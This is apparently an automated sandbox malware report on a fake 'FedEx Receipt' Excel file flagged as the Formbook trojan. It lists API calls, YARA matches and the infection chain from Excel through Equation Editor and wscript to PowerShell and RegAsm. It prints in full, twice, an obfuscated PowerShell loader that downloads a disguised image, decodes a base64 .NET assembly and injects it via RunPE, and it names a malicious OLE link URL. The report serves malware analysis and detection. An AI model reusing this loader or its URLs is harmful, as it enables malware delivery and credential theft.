Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FED0 NtAdjustPrivilegesToken,	12_2_0238FED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FF34 NtQueueApcThread,	12_2_0238FF34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FFB4 NtCreateSection,	12_2_0238FFB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FFFC NtCreateProcessEx,	12_2_0238FFFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FC30 NtOpenProcess,	12_2_0238FC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FC60 NtMapViewOfSection,	12_2_0238FC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FC48 NtSetInformationFile,	12_2_0238FC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FC90 NtUnmapViewOfSection,	12_2_0238FC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FD5C NtEnumerateKey,	12_2_0238FD5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FD8C NtDelayExecution,	12_2_0238FD8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02391D80 NtSuspendThread,	12_2_02391D80

Detected potential crypto function

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041681F	12_2_0041681F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00416823	12_2_00416823
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00403180	12_2_00403180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004101A3	12_2_004101A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040E223	12_2_0040E223
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00402C70	12_2_00402C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00401C23	12_2_00401C23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00401C30	12_2_00401C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00402500	12_2_00402500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042D663	12_2_0042D663
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040FF7A	12_2_0040FF7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040FF83	12_2_0040FF83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040278D	12_2_0040278D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00402790	12_2_00402790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0239E2E9	12_2_0239E2E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023A2305	12_2_023A2305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023EA37B	12_2_023EA37B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023C63DB	12_2_023C63DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_024463BF	12_2_024463BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0239E0C6	12_2_0239E0C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023EA634	12_2_023EA634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02442622	12_2_02442622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023A4680	12_2_023A4680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023AE6C1	12_2_023AE6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023AC7BC	12_2_023AC7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0242443E	12_2_0242443E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023E6540	12_2_023E6540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_024205E3	12_2_024205E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023BC5F0	12_2_023BC5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02426BCB	12_2_02426BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0244CBA4	12_2_0244CBA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023C286D	12_2_023C286D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023AC85C	12_2_023AC85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023EC920	12_2_023EC920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023A29B2	12_2_023A29B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_024349F5	12_2_024349F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023B69FE	12_2_023B69FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0244098E	12_2_0244098E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023D2E2F	12_2_023D2E2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023BEE4C	12_2_023BEE4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023B0F3F	12_2_023B0F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02412FDC	12_2_02412FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0243CFB1	12_2_0243CFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0242AC5E	12_2_0242AC5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02442C9C	12_2_02442C9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023D0D3B	12_2_023D0D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023ACD5B	12_2_023ACD5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02441238	12_2_02441238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023A7353	12_2_023A7353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0239F3CF	12_2_0239F3CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0241D06D	12_2_0241D06D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023CD005	12_2_023CD005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023B905A	12_2_023B905A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023A3040	12_2_023A3040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0242D13F	12_2_0242D13F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0243771D	12_2_0243771D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0242579A	12_2_0242579A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023D57C3	12_2_023D57C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023DD47D	12_2_023DD47D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023B1489	12_2_023B1489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023D5485	12_2_023D5485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023A351F	12_2_023A351F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_024435DA	12_2_024435DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02453A83	12_2_02453A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023C7B00	12_2_023C7B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0242DBDA	12_2_0242DBDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0239FBD7	12_2_0239FBD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0241F8C4	12_2_0241F8C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0243F8EE	12_2_0243F8EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0242394B	12_2_0242394B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02425955	12_2_02425955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023CDF7C	12_2_023CDF7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0242BF14	12_2_0242BF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0243FDDD	12_2_0243FDDD

Document contains embedded VBA macros

Source: FedEx Receipt_53065724643.xls

OLE indicator, VBA macros: true

Document embeds suspicious OLE2 link

Source: FedEx Receipt_53065724643.xls

Stream path 'MBD00023D36/\x1Ole' : http://ilang.in/BrlcBqA?IO15WZTK0N3T~JY?{q.q^HoV-Q|~Hus:s9Mqf~! k,!Z2X0bL1G9lUmbGuDxB7Jknx6ld8yukv9gO2F4wq2dpLfgSZkjmdSe3mNwyo5hlDmOqb8qNiZOkn1sSec7bIIzBKjmwZIjBbFTsaup1blbV1ZGEYDD9EuRnW4XpZSQkw7SwjLXoXIOtT3j5UX0orbK2JyT8ps\e#Io_Gj]}

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~DFE1D622D06AD63FEF.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF5C7C8EE0310B7690.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{3A50CEE2-6F27-47C4-9BA8-0FD0C2B7AD90}.tmp.4.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0239E2A8 appears 60 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0240F970 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 023E3F92 appears 132 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 023E373B appears 253 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0239DF5C appears 137 times

Yara signature match

Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD4612E1.doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ima.imim.im.imim[1].doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@11/41@9/4

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\I0GD6N06.txt

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR8313.tmp

Jump to behavior

Source: FedEx Receipt_53065724643.xls	OLE indicator, Workbook stream: true
Source: B9930000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS"

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: FedEx Receipt_53065724643.xls	Virustotal: Detection: 29%
Source: FedEx Receipt_53065724643.xls	ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)\| IEx"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)\| IEx"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
